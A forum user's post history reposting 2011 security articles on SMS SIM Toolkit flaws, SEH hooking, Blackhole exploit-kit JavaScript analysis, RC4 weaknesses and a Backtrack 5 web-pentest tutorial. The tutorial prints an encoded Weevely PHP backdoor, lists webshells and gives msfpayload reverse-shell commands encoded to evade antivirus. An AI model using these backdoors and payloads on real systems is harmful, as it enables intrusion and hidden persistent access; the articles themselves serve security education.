Everything posted by Nytro

  1. Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages
     By Lucian Constantin, Dec 19, 2011 3:50 pm

     Attackers can force mobile phones to send premium-rate SMS messages or prevent them from receiving messages for long periods of time by leveraging a logic flaw in mobile telecommunication standards. The flaw was discovered by independent security researcher Bogdan Alecu, who demonstrated how it can be exploited at the DefCamp security conference in Romania on Saturday.

     Alecu exploited the way mobile devices process text messages intended for special applications called SIM Toolkits, which he said are preloaded on SIM cards by over 90 percent of mobile operators. The applications can perform actions that include checking credit or voice mail, calling emergency numbers or customer support, and even performing mobile banking, and typically appear on the phones as a menu or application bearing the operator's name. SIM Toolkits can receive commands through specially-formatted SMS messages, but in order for these commands to be executed successfully, the message headers must contain a valid digital signature.

     The vast majority of mobile phones don't display any notification when they receive SIM Toolkit messages, he said. Some wake from their sleep state, but no message is visible in the inbox and there's no other indication that a message was received. The encryption used to verify message authenticity is pretty solid and can't be cracked, Alecu said. Instead, his attacks rely on phones automatically returning error messages rather than executing legitimate commands.

     Automatic Replies by Default

     Error replies are sent automatically. Users of some phones might see a message is being sent, but they can't usually stop it. Alecu tested his exploits on phones from various manufacturers. Only devices from Nokia have an option to ask phone owners to confirm sending a SIM Toolkit response. The option, "Confirm SIM Service Actions," is usually off by default, especially on phones configured by operators.

     He tested phones from High Tech Computer (HTC) and Samsung Electronics running stock Android firmware, and an LG Optimus One with CyanogenMod, a community-built version of the popular mobile operating system. None of them displayed a notification when sending SIM Toolkit responses, and he found no option to block responses. BlackBerry devices presented a similar behavior, he said. Windows Mobile 6.x devices and iPhones notified users a message was being sent, but offered no way to stop it. Alecu hadn't yet tested a Windows Phone 7 device.

     The sender of a SIM Toolkit service message can request that the phone reply via SMS either directly to the sender's number, or to the operator's message center, according to Alecu.

     How Scammers Attack

     Those two options give rise to two different attack scenarios, he said. For the reply-to-sender option (SMS-SUBMIT), an attacker could force the sending of the error message to a premium-rate number using an SMS spoofing service. SMS spoofing is the practice of changing the originating number of a text message to anything the sender desires. This can have legitimate as well as malicious purposes, and there are many online services that provide the feature for a small fee.

     Some mobile operators have strict rules on setting up premium-rate numbers. Applicants might be asked to prove that they are a registered business and provide information about how the number will be used. Restrictions can also be placed on the text strings that a message must contain in order for the sender to be charged, which would limit this attack because the attacker can't control the content of the automatic response. However, the number and diversity of existing SMS scams is proof that obtaining a premium-rate number is not that difficult.

     If the second option (SMS-DELIVER-REPORT) is used, the error is sent to the operator's message center where it is interpreted as a message delivery failure. When messages can't be delivered, because a phone is turned off or outside the service area, operators usually attempt to resend the undelivered message every few minutes for a predefined period of time. When this happens, all subsequent messages intended for that number are placed in a queue to be delivered when the phone re-joins the network. Because receiving a bogus SIM Toolkit message will always result in an error response, a loop is created between the message center and the phone, preventing the subscriber from receiving legitimate messages. This denial-of-service (DoS) condition is not permanent and after a while, typically 24 hours, the undelivered message is automatically discarded. However, if an attacker were to send seven bogus SIM Toolkit messages one after the other, the message center would attempt to deliver each of them for 24 hours, resulting in a week of SMS DoS.

     Flaw Revealed

     Alecu demonstrated the attacks on SIM cards from multiple operators in Romania, Bulgaria, Austria, Germany and France. However, since the attacks exploit a logic flaw in the GSM standard and later mobile standards, he believes that the majority of operators that use SIM Toolkits are affected.

     Mitigating the attack is possible at both operator and device level. Operators can filter SIM Toolkit messages and restrict which numbers are allowed to send them. This would be an elegant solution, but Alecu has yet to find an operator that implemented it. Phone manufacturers could enforce confirmation for SIM actions from their software. However, this fix will probably not be as effective as message filtering at operator level, Alecu said. Firmware updates are not always easy to install, especially on older phones. Performing a firmware upgrade in the wrong way can render devices unusable and many affected phones might not even be supported anymore.

     The U.S. Computer Emergency Readiness Team (US-CERT) was notified of the problem in August 2010, and was asked to coordinate the disclosure process, Alecu said. He said Research In Motion (RIM) has contacted him and is working on a fix. "We are aware of the claims and are investigating them," Nokia spokesman Tomi Kuuppelomäki said. Samsung, HTC, RIM and Apple did not return a request for comment.

     Source: Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages | PCWorld Business Center
  2. There are no girls or boys here, only members, regardless of sex. The reason is simple: sexual, ethnic or any other kind of discrimination happens. But we believe in freedom of expression, so they are allowed.
  3. "If it is not free, it is a product. If it is free, maybe you are the product."
  4. Microsoft has launched its own social network (Video). Author: Emilian Nedelcu, Monday, 19 December 2011, 08:24. Microsoft recently launched a social network, called So.cl (pronounced "social"), which for now is available to a small number of people. Company representatives stated that So.cl will be a social network intended for students, to help them share information quickly, build pages or obtain information quickly, in order to turn the Internet and the existing social networks into one big classroom. Similarly, Facebook, the world's largest social network, with over 800 million users, was initially intended only for a limited number of students. So.cl is an experimental research project, according to Microsoft officials, which is available to students of the computer science and design faculties at Washington University, Syracuse University and New York University. Other universities will be added over time. So.cl was designed for students to extend their educational experience and to help them rethink how they can learn and communicate. Users of the network can write posts surrounded by elements such as photos, video or text. Users can identify other users with similar interests, and the network allows communities to be built around a particular (educational) purpose. Up to this point, the So.cl network offers nothing new, all of these features being present, for example, in Facebook as well. So.cl users can follow other people, or can set up feeds. Users can also follow only certain people or see what all of their registered friends write. Source: Microsoft si-a lansat retea sociala (Video)
  5. No, that is our Gecko: Gecko (layout engine) - Wikipedia, the free encyclopedia
  6. Ah, made by you, congratulations. But I think the first version looked better.
  7. Jokes about the "kitchen", it's definitely a girl. Welcome.
  8. Reverse Engineering Mac OS X

     Mac OS X

     2005 and before
     - Mach-O Infection.ppt (presentation)
     - Breaking Mac OS X.ppt (presentation)
     - Hacking Mac OS X Kernel for unsupported machines.pdf (paper)
     - MacOS Kernel Insecurity.pdf (presentation)
     - Overriding Mac OS X.pdf (paper)
     - A Debugger with Gui in OS X.pdf (paper)

     2006
     - Abusing Mach on Mac OS X.pdf (paper)

     2007
     - Hacking Leopard.pdf (paper)
     - Inside the Mac_OS X_kernel.pdf (paper)

     2008
     - BlackHat-Japan-08-Miller-Hacking-OSX.pdf (presentation)
     - BH-US-08-Dtrace The Reverse Engineer’s Unexpected Swiss Army Knife (presentation)
     - iRK – Crafting OS X Kernel Rootkits (presentation)
     - RETrace – Applied Reverse Engineering on OS X – defcon-16.pdf (presentation)
     - Under the iHood – REcon 2008.pdf (presentation)
     - Covering-tracks-Mac-OS-leopard_5991.pdf (paper)
     - OSX_Rootkits – the next level.pdf (presentation)

     2009
     - Advanced Mac OSX Rootkits.pdf (paper)
     - Defcon-17-bosse_eriksson-kernel_patching_on_osx.pdf (presentation)
     - D1T1 – Dino Dai Zovi – Mac OS Xploitation.pdf (presentation)
     - Advanced-Mac-OS-X-rootkits.pdf (presentation)
     - Dynamic Tracing for Exploitation and Fuzzing-final.pdf (presentation)
     - Mac-os-malware-analysis_33178.pdf (paper)
     - Objective-c-internals.pdf (presentation)
     - Hacking Macs for Fun and Profit – csw09-daizovi-miller.pdf (presentation)
     - Macos xploitation-source2009.pdf (presentation)
     - Debugging Cocoa with DTrace.pdf (paper)
     - BlackHat-DC-09-Iozzo-Macho-on-the-fly.pdf (presentation)
     - Dynamically Overriding Mac OS X – Down the Rabbit Hole.pdf (presentation)
     - Encryption Wrapper on OSX.pdf (presentation)

     2010
     - Function-hooking-for-OSX-and-Linux.pdf (presentation)
     - Mac Os X Hacking SnowLeopard.ppt (presentation)
     - BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-slides.pdf (presentation)
     - BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf (paper)
     - Post exploitation techniques on OSX and Iphone – eusecwest.pdf (presentation)
     - Programacion de rootkits en Mac OS X.pdf (paper, in Spanish)

     2011
     - Defiling-Mac-OS-X-Kernel-Rootkits-Ruxcon.pdf (presentation)
     - Hacking at mach2.pdf (presentation)
     - The Apple Sandbox – BHDC2011-Paper.pdf (paper)
     - The Apple Sandbox – BHDC2011-Slides.pdf (presentation)
     - Battery Firmware Hacking.pdf (paper)
     - iSEC_BH2011 – Macs in the Age of APT.pdf (presentation)

     iOS

     2009
     - BlackHat-Europe-2009-Miller-Iozzo-OSX-IPhone-Payloads-whitepaper.pdf (paper)

     2010
     - iPhone Rootkit Toorcon 2010.pdf (presentation)
     - D2T1 – Cedric Halbronn and Jean Sigwald – iPhone Security Model.pdf (presentation)

     2011
     - D1T2 – Laurent Oudot – Extracting Senstive Data from Your iPhone.pdf (presentation)
     - D2T2 – Jean-Baptiste Bédrune & Jean Sigwald – iPhone Data Protection in Depth.pdf (presentation)
     - Auditing iPhone and iPad applications – van Sprundel.ppt (presentation)
     - Practical Consideration of iOS Device Encryption Security.pdf (paper)
     - Apple iOS 4 Security Evaluation.pdf (presentation)
     - BH_US_11_DaiZovi_iOS_Security_WP.pdf (paper)
     - BH_US_11_Belenko_iOS_Forensics_Slides.pdf (presentation)
     - BH_US_11_Belenko_iOS_Forensics_WP.pdf (paper)
     - BH_US_11_Esser_Exploiting_The_iOS_Kernel_Slides.pdf (presentation)
     - BH_US_11_Esser_Exploiting_The_iOS_Kernel_WP.pdf (paper)
     - D2T1 – Stefan Esser – iPhone Exploitation – One ROPe to Bind Them All.pdf (presentation)
     - D2 SIGINT – Keith Lee – iPhone Espionage.pdf (presentation)
     - D1T1 – Stefan Esser – Antid0te 2.0 – ASLR in iOS.pdf (presentation)
     - SysScan-Singapore-Targeting_The_IOS_Kernel.pdf (presentation)

     Source: Papers | Reverse Engineering Mac OS X
  9. SEH Hooking
     Saturday, December 17, 2011

     In this example, I will cover a method of hooking which uses SEH (Structured Exception Handling) in order to hook code in any location without overwriting the code. This method of hooking is very much like the SEH Hooking which is used by many debuggers to place breakpoints, but has two small differences. Instead of writing INT3 Breakpoints and catching the BREAKPOINT Exception, I'm setting the memory to PAGE_NOACCESS and catching the ACCESS_VIOLATION Exception. Instead of writing the address of my handler to the PEB directly, I'm using a VEH (Vectored Exception Handler), which is being added using the AddVectoredExceptionHandler() WinAPI Function.

     This method of hooking works by modifying the protection of a byte of memory at the location of our hook to PAGE_NOACCESS. When this memory is executed, our VEH catches an ACCESS_VIOLATION Exception. It then checks the instruction pointer to see if the violation occurred at the location of our hook. If this ACCESS_VIOLATION is not our hook, we return CONTINUE_SEARCH to allow other handlers to work with the exception. However, if it is our hook, we do 3 things:

        1. Execute our hook's callback
        2. Restore the memory access to its original state
        3. Set the trap flag, which will trigger a single step

     We then return CONTINUE_EXECUTION. This time, the hooked code executes its first byte flawlessly and then triggers a SINGLE_STEP Exception. This single step is a result of setting the trap flag, and it allows us to set the hooked memory back to PAGE_NOACCESS so our hook will execute again the next time the hooked memory is accessed.

     Since our exception handler's ContextRecord contains a pointer to the top of the stack, we are also able to access function arguments and find return addresses. Because of this, we can block the execution of a function or change the input, just like in a normal hook. To block execution, we can place a JMP [ReturnAddressFromStack] in our hook handler. While this jumps right back into execution and skips steps 2 and 3 of our exception handling, it is jumping back to the calling function and not the hooked code. The NOACCESS remains in place for next time.

     While this rendition of SEH Hooking isn't flawless, it does illustrate the concept and get the job done. In most cases, if you plan on using SEH Hooking, I would recommend using INT3 Breakpoints, though. This method, however, is a good way to bypass modification detection. While programs may checksum their code, they don't usually verify the memory protection of every page in the program.

     In the example code, I hook the MessageBoxA() WinAPI Function. Inside my handler, I call printf() to print the caption and text to the console. I then block execution of MessageBoxA().

     Source: Rev++: SEH Hooking
  10. Intro to javascript malware analysis
     Posted by Ax0n

     I am by no means an expert on this stuff. A few weeks ago, I ran across some suspicious links in spam and decided to see where they led. Some of them claimed to be from financial institutions that I have absolutely no connection to, and claimed that some transaction had failed to occur. Others were variants of shipping confirmation scams, pharmacy junk, etc. I wish I could say that I have no idea how people fall for these, but the fact is that some people will literally click on anything that shows up in their inbox, open any attachment and follow any link, no matter how blatantly fake we professionals think these scams are.

     What lay at the tail end of all the script="http://some-site/whatever.js" includes and document.location redirects? A webpage that'd been owned, filled with a huge pile of nonsensical gibberish that could barely pass as javascript, which happened to be part of the Blackhole Exploit Kit. I've done my share of picking apart obfuscated javascript before, but it had been a while. I gave a presentation of this same thing at KC2600 a few weeks ago. Then, this week, a colleague of mine who missed the meeting ran into the same thing in the wild. I passed on what I'd learned, and decided it might be time to write it up with a little more detail than I did a few weeks back. He made this quick video that covers how he was able to de-obfuscate this particular sample:

     By now, I've seen several different obfuscation schemes for BlackHole, but once it's decoded, it all looks about the same. The introductory basics are simple. Minimize the potential of infection by using a non-privileged account (and perhaps an OS other than Windows) and/or minimize the impact of a successful infection by running a virtual machine that you can blow away or revert to a snapshot of a known clean state. For the malware I'm using in this example, either (or both) of the above criteria will be ample to keep things from getting out of control. Other malware may be more insidious or may target non-Windows platforms. I have a few friends that have unwittingly infected their own workstations while trying to analyze things. Play safe.

     Once you have a safe lab environment, your goal is to examine a suspicious link and dissect it. In my case, I was able to find a few links to malware in my personal mail's spam folder. For the demo at KC2600, I used Malware Domain List to find some Blackhole samples. In the wild, there may be any number of redirects ahead of the malware. You may see a shortened URL (through goo.gl, tinyurl, etc) which goes to a sparse HTML page with several calls to javascripts hosted on various sites, and those javascripts may simply be a document.location pointing to the malware. I usually stick with curl or wget to pull down suspicious links, and then I keep looking at the content and following the redirects until I strike gold.

     The javascript itself is ugly once you get to it. Sometimes, the byte array is only a few (really long) lines. Other times, like this sample, each byte of the obfuscated data is on a new line, like this:

     You'll see a few interesting things. There's an "e=eval;" line near the bottom, and then "e(c);" after that. It doesn't take a coding genius to realize that this is a way to call eval(c) without triggering some IDS signatures that look for "eval(". Many samples I saw weren't quite this obvious. In fact, the script in the video has the eval alias in a different part of the script. In fact, the script in the video varies in several ways.

     To turn this cryptic payload into something that resembles actual javascript, there's a post on SANS ISC from several years ago covering a few methods. I went with the so-called Tom Liston Method, essentially trying to wrangle the decoded stuff that was destined for the exec function into a document.write within a textarea box instead. Note: I ran into one sample of BlackHole that has a /textarea tag near the beginning, which would keep someone from using this trick to easily view the code, but I don't think it will exec the stuff behind it since it's been changed to a document.write.

     In the above example (and in the video), the content that is destined for exec is stored in variable "c", so you simply replace "e(c);" with:

     document.write('<textarea cols="150" rows="100">' + c + '</textarea>');

     But obviously, you need to use some brain power here to figure out what trickery they're using to call exec, and what the variable is that needs to be wrapped up in the above document.write command. You may also wish to mess with the rows and columns on the textarea. I know on my netbook, that textarea size is far too unwieldy. On my desktop, it's almost perfect. Make sure the file is renamed as a .html, then load it up in your safe lab environment's browser, just in case something goes wrong. Voila.

     If you scroll through recent versions of BlackHole Exploit Kit, you'll see that it tries to load an embedded java applet and a PDF, both of which are designed to exploit recent vulnerabilities in JRE and Adobe Reader. Since I don't have Windows running in a VM environment (and I'm not keen on actually infecting any of my Windows boxes) I'm not entirely sure what gets loaded from there. I'm guessing the carberp trojan, given most of what I've read lately. If that's the case, a successful infection would likely block access to anti-malware sites, try to sabotage existing security software, and start gathering sensitive data such as card numbers and online banking credentials.

     Source: HiR Information Report: Intro to javascript malware analysis
  11. [h=2]Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5[/h] December 16th, 2011|By: Hari Krishnan Web application analysis plays a major role while doing a vulnerability assessment/penetration test. Proper information about the web application (for example like type of plugins used; CMS type – whether it is joomla, wordpress, etc.) can help the pentester determine the right exploit to use, as well reduce the overall time spent in doing so. Backtrack 5 comes with a very good set of tools required for performing all necessary information gathering. Tools for performing web application analysis are: CMS Identification IDS/IPS Detection Open Source Analysis Web Crawlers Vulnerability Assessment and Exploitation Maintaining Access [h=2][/h] [h=2]CMS Identification:[/h] blindelephant cms-explorer whatweb [h=3]BlindElephant[/h] BlindElephant is a python based tool for fingerprinting the web applications. This tool basically attempts to discover the version used by comparing the static files at certain known locations against the hashes which are pre-computed for the versions of those files. The tool is fast, non-invasive, takes low bandwidth and is highly automated. Usage: root@root:/pentest/web/blindelephant/src/blindelephant#python BlindElephant.py [options] url appName We can use the appName as “guess” if we are not sure about the web application or plugin type used. [h=3]CMS-Explorer[/h] CMS-explorer is another web application fingerprinting tool (written in perl) which can be used to identify the type of cms used and hence, perform the attack according to the information. There are few advantages in this tool, such as checking for any vulnerability from OSVDB for the particular plugin or CMS detected, updating the list of WP, Drupal, verbosity, looking into themes, and so forth, all of which gives the pentester a lot of information for performing the PT. 
Usage: root@root:/pentest/web/cms-explorer# python cms-explorer.pl -url target -type type [options] [h=3]WhatWeb[/h] WhatWeb is again used to identify the type of content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries and servers used. This tool has over 900 plugins for scanning purposes, supporting proxy (including TOR), can defined with ip ranges similar to NMAP, fuzzing matching, and so forth. Usage: root@root:/pentest/web/whatweb# ./whatweb target.com ./whatweb –l will list the plugin list. [h=2]IDS-IPS detection[/h] While performing a VA/PT on a domain, there is the chance that IDS-IPS is installed. This can sometime stop various types of attacks performed on the domain. A lot of WAFs are sold to companies as a valid mitigation technique for web application vulnerabilities. Luckily, WAF is easy to detect because most of these use signature-based detection methods. Thus, the attacker can try to encode the attacking parameters and try to bypass the WAFs. Backtrack comes with two handy tools for detecting the IDS-IPS and they are waffit ua-tester [h=3]Waffit:[/h] Waffit is a web application firewall detection tool. Detecting the firewall behind the domain is a very important step during the penetration testing process. WAF can sometimes introduce vulnerabilities if it’s not configured. Analyzing them is also a major concern while doing a VA/PT. WAFs are usually easy to detect and they can be bypassed by encoding the attack parameters . Usage: root@root:~$python wafw00f.py Target.com : Furniture, Baby, Electronics, Toys,...: Target [h=2][/h] [h=2]Open-Source Analyses:[/h] Open-source analyses are conducted using tools like ghdb, revhosts, xssed, maltego . The ghdb and xssed are linked to websites, while the other two are tools. GHDB: GHDB stands for Google Hacking Database. The exploit-db team maintains a database for google dorks which can come handy for pentesters gathering information. 
We can use the dorks for finding certain types of vulnerable servers or other information. For example, a google dork like “Microsoft-IIS/6.0? intitle:index.of” can be used to detect the server which is running Microsoft IIS 6.0. Another advantage of this is that it gives a little anonymity, as well as helping pen testers to attack or perform a VA with more precision. Xssed: Xssed.com is another website that contains a list of cross-vulnerable websites, submitted by various authors. Pentesters can search for their target in the xssed.com database or check for other information that can be helpful during the VA/PT. Revhosts: Revhosts is a project for Passive information Gathering. It’s written in Python and likewise helps pentesters to gather information (i.e., the host, VirtualHost, DNS entry, directories, mail address, subnet, etc.). This tool comes both in GUI and console. [h=2]Web Crawlers:[/h] The final category of web application analyses is the web crawler. The tool found in BT5 is called webshag, and it comes in both GUI and console based. Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication Webshag has options like port scan, gathering basic information, spider, fuzzing Downlink: S C R T :: Attack : Downloads : Webshag. [h=2]Vulnerability Assessment and exploitation:[/h] The vulnerability assessment stage is where we scan our target for any loopholes or bugs. Before doing a vulnerability assessment, gathering information about the target will be more helpful. The information gathering phase remains the key step before performing further attacks, simply because it makes the work easier. So, for example in the first stage: in using the CMS scanners like BlindElephant, we scanned and found the version of the application installed. Here it is: joomla. Now in the Vulnerability assessment stage, we used scanner like joomscan. Below is the image showing the vulnerability in a particular site. 
Usage: ./joomscan.pl –u Target.com : Furniture, Baby, Electronics, Toys,...: Target or IP address The joomscan scans all the plug-ins installed and gives details about the vulnerabilities. We can use this information for further attacks. SqlMap: SqlMap is another good tool in the vulnerability assessment category. This tool can test whether the target url is vulnerable or not. Below is the example, where the highlighted text tells us that the parameter “newId” is vulnerable. The usage is as follows: ./sqlmap.py –u target.com -f Fimap: fimap is a python- based tool which can be used to find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. More modules and functionalities are being added to this tool, making it even more powerful. Fimap also allows us to add our own payloads. Usage: fimap -u IANA — Example domains -U defines the target url To scan a list of url from a text file, the command would be fimap -m -l ‘/tmp/urlscan.txt’ -m is for mass scanning -l is for list Scan websites using google dorks .fimap.py -g -q ‘inurl:include.php’ -g for searching from google -q stands for the query which is to be searched in google. Fimap can exploit the vulnerable target and can also upload an interactive shell for more exploitation Xsser: Xsser is an automatic -framework- to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing the filters and other mode of injection. Usage: ./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch="–referer"666.666.666.666?–user-agent"correctaudit" This tool gives information like attack url, browsers and the method of the attack. Once the vulnerable url is detected, we can open the url and check it to confirm. theHarvestor: theHarvester tool is used for gathering user names, their email accounts, hostnames/subdomains from public resources (like, for example, google, bing, etc.). This tool again helps the pentester during the initial stage of VA/PT. 
It can be found in the “Web open source assessment ” option under web vulnerability assessment. Usage: ./theHaervester.py –ld [target domain] –d [ data source] The domains and the emails related to the particular website are being extracted, which can help for further attacks or research about the target. Shodan: This is, again, another web-based assessment tool of particular usefulness for pentesters. It can be used to gather a range of intelligence about the target devices which are connected to the internet. We can, for example, search to see if any network devices like routers, Voip, Printers, cams etc. are in place. To search if any service is running in the domain, the syntax would be: Syntax: Hostname:target.com port:80,21,22 Or simply to find out the results about the hostname, then simply search for Syntax: Hostname:target.com W3af: W3af is auditing and web application attack tool. It’s basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle, all of which can be used accordingly. These modules in w3af comes with various sub modules like, for example, we can select sqli option in Audit module, assuming that we need to perform a particular type of auditing. The below diagram shows a brief flowchart of the target website and makes it’s more easy to understand. Once the scan is completed, the W3af framework shows detailed information about the vulnerabilities found in the target website which can be compromised accordingly for further exploitation. Once the vulnerability is found, we can configure the plugins in the “Exploit” tab and perform further attacks, which can help us to get a webshell in the target site. Another major advantage is W3af also comes with MSF for taking the attack to next level. The results can be exported to html format, also. 
[h=2]Maintaining Access:[/h] Once we have access to the target website, we need to maintain access for future use because we don’t want to be starting from square one again and again. In order to avoid this, we can upload the web shells or backdoors to the target website. And encoding your backdoor is also important, since it should not create noise once uploaded in the server. If it does, then the administrators can easily detect it and remove the backdoors. BT5 comes with few good options for uploading webshells. Weevely: Weevely is a stealthy PHP backdoor, designed to stay beneath the radar. It provides a telnet-like connection, using a dynamic probe of system like functions to bypass PHP security restrictions. Weevely seeks functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()), using the functions enabled on a remote server. The below code is a sample code of the backdoor created by the weevely. eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’)); Usage: To create a backdoor. Weevely.py –g –o filename –p password This will create a backdoor with a specific name and will be password protected. Upload to the target server and access the backdoor using the following command: Usage: weevely.py –t –u http://Remote-IP/backdoor.php -p infosec Webshells: Here is a list of specific web shells which can be used. These are useful in various situations, such as if the web application has a vulnerability (like file upload) or any others that can help us to upload the backdoors. Depending on the website type (for example, if the website is coded in php), then use the php based backdoors. 
The following web shells are available:

simple-backdoor.php
php-backdoor.php
jsp-reverse.jsp
cmdjsp.jsp
cmd-asp-5.1.asp
cmdasp.aspx
perlcmd.cgi
cfexec.cfm

MsfPayload: Metasploit can be used to create backdoors which can then be used for maintaining access in the target server. This can be done with the help of msfpayload. The steps for creating a backdoor in msfpayload are as follows:

We need to select the payload which we are going to use to get a Meterpreter shell spawned via a reverse TCP connection. The command would be:

msf > msfpayload windows/meterpreter/reverse_tcp

This payload needs two parameters: LHOST (the attacker's IP address), and LPORT for selecting the port that we are going to use. The "R" is then used to give the output file in RAW data format so that we can encode it later on.

msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

This will create the payload, but it has to be encoded in order to avoid AV detection. This can be done using the msfencode option. In order to do this, we need to pipe ("|") the output generated by msfpayload to msfencode.

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t exe >> infosec.exe

-e can be used to specify the type of encoding needed. Here I am using shikata_ga_nai encoding, and -t for the type of file extension. Here it's an exe file. Below is the image of the list of encoders available in MSF.

Conclusion: These are but a few methods followed while performing an exploitation of a web application. Once we get the information about our target, try to perform a vulnerability assessment in order to get information about the loopholes which can be used. Once this is done, exploit the vulnerabilities and, if necessary, upload a backdoor. As I've said before, encode the backdoors in order to avoid detection. Hope this helps you in finding vulnerabilities, exploiting them and maintaining access in your target.
Source: Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5 | InfoSec Institute - IT Training and Information Security Resources
  12. [h=3]What's the deal with RC4?[/h]
[h=2]Thursday, December 15, 2011[/h]

Jacob Appelbaum tweets:

Does anyone have a good reading list on practically attacking RC4?

I don't propose to give an exact answer to Jacob's question here, but his tweet caught my eye for a reason. You see, just the other week I advised implementers to avoid RC4 -- both because it's easy to misuse, and because it has some real and theoretical flaws. But that doesn't mean any particular RC4 implementation is broken. Instead, I'd prefer you to view my advice as the crypto equivalent of "don't run with scissors", "don't run near the pool", or "don't run near the pool while carrying scissors". I don't know anyone who's actually lost an eye because they ignored these warnings, but I'll still yell this stuff at my kids. It's common sense.

Still, that doesn't answer the burning question: how bad is RC4, really?

RC4, the stream cipher for the rest of us

First, some background. RC4 was invented in 1987 by Ron Rivest. It spent its first seven years as an RSA trade secret before it was eventually leaked to a public mailing list in 1994. The rest, as they say, is history.

You could argue that RC4's popularity was inevitable. For one thing, it was already in widespread commercial use. It was fast in software, something that DES wasn't. More importantly, the scheme itself is dirt simple. You can fit the code for RC4 onto a T-shirt, with plenty of room left over for, well, another T-shirt. And don't forget that, once leaked, the 'alleged' RC4 was free.

The scheme consists of two parts: a key scheduling algorithm (KSA), and a pseudo-random generator (PRG). To encrypt a message, you run the key through the key scheduler, which produces a scrambled array called the state vector. You then feed the state vector into the PRG, which continuously permutes it while outputting a series of bytes. You then XOR those 'keystream' bytes with your plaintext.
RC4 is probably most famous for its (mis)use in 802.11 WEP. It's still used in WPA-TKIP (unsurprising, since TKIP is just a bandaid patch for WEP). But its use goes way beyond that. For one thing, it's a common ciphersuite for TLS, and as of a year or two ago it was even preferred by browsers like Chrome. Up until recently, Microsoft used it everywhere. Skype uses it to obfuscate (though not to encrypt) its communication protocol. It shows up in malware and a zillion crappy DRM packages. To make a long story short, you'll find RC4 anywhere the hardware was too weak, or the developers too lazy to use a better cipher.

The plain stupid

There are a few basic things you need to avoid when using any PRG-based stream cipher. These aren't specific to RC4, but for some reason they seem to crop up at a higher rate in RC4 implementations than with other ciphers.

The big honking obvious one is that you can't re-use the same RC4 keystream to encrypt two different messages. I hope I don't need to go into the consequences, but they're bad. Don't do it. You'd think this is so obvious that nobody could get it wrong, but that's exactly what Microsoft famously did back in 2005, encrypting different versions of a Word document with the same key. If you must use the same key for different messages, the solution is to combine the key with an Initialization Vector or 'nonce'. Unfortunately this can be problematic as well.

Another big issue is ciphertext malleability. If you flip a bit in an RC4 ciphertext, you'll see the same bit flipped in the decrypted plaintext. This is awesome at parties. More to the point, it can lead to practical padding-oracle type attacks that totally compromise the security of your encryption.* The solution to the latter problem is simply to MAC your ciphertexts. Unfortunately, people don't use RC4 because they know what a MAC is -- they use RC4 because you can download the code from Wikipedia.
So, again, I would say that this stuff tends to happen more than it should.

Key Scheduling

Leaving aside the stupid, the real problem with RC4 is the Key Scheduling Algorithm (KSA), which kind of sucks.

Picture a brand new box of playing cards. Starting with the unshuffled deck, work systematically from top to bottom, swapping each card's position with another card in the deck. The position you're swapping to is determined by a few simple computations involving the original card's face value and the cryptographic key. Now do this with a stack of about five ordered decks and you've got the RC4 KSA.

While this shuffle is thorough, the basic problem is that it isn't quite thorough enough. This leads to predictable patterns that show up in the first PRG output bytes. For example, Mantin and Shamir noted that the second output byte takes on the value '0' with about twice the probability it should. By itself that may not seem terribly useful, but for one thing: it's enough to practically determine whether an unknown algorithm is RC4, given about 128 keystreams on different (random) keys.

From what I can tell, the first person to notice problems with KSA was Andrew Roos, who posted a paper to sci.crypt about a year after the leak. Aside from the fact that it was published on Usenet, Roos's result is notable for two reasons. First, he correctly identified use of concatenated IVs as a likely source of weakness in WEP implementations -- years before the FMS attack. Second, he gave recommendations that -- had they been followed -- would have prevented the whole thing. (Life lesson: don't publish important results in newsgroups.)

FMS

Roos's paper set the table for the most famous attack on RC4, and the one that people still associate with RC4, even though it's been improved upon substantially. This is, of course, the Fluhrer, Mantin and Shamir, or 'FMS' attack, which appeared in 2001.
Just like Roos, FMS looked at the KSA and found it wanting -- specifically, they discovered that for certain weak keys, the first byte output by the PRG tends to be correlated to bytes of the key. These weak keys can be obtained by prepending a few chosen bytes (say, 3 of them) to an unknown, fixed, secret key. Given keystreams resulting from 60 such chosen keys, you can derive one byte of the secret portion of the key. A 16-byte key can therefore be computed from about 960 such keystreams.

On the face of it this sounds pretty unlikely -- after all, how are you going to get an encryptor to prepend chosen bytes to their secret key? Fortunately the attack works fine even if the adversary just knows that the appropriate bytes were used. This works perfectly for implementations that prepend (or append) a known Initialization Vector to the WEP key. Simply by observing a few million IVs, an attacker can eventually collect enough keystreams to meet the FMS requirements.

All of this would have been a historical footnote if it hadn't been for protocols like WEP, which (among its many problems) used a three-byte prepended IV. FMS was quickly demonstrated to work on WEP, then packaged into a neat tool and distributed.

Klein, Dropping and Hashing

There are two competing approaches to dealing with the FMS attack:

1. Drop the first N bytes of the RC4 keystream, for values of N ranging from 256 to 3,072.
2. Don't concatenate the IV to the key, hash the two together instead.

The first option is sometimes referred to as RC4-drop[N], and the actual value of N has been subject to some debate. In 2006, Klein presented a super-charged variant of the FMS attack that reduced the number of needed IVs from millions down to about 25,000. More importantly, he showed that FMS-type attacks are still (borderline) viable even if you drop the first 256 bytes of the keystream. So 768 seems like a bare minimum to me, and some people will argue for much larger values.
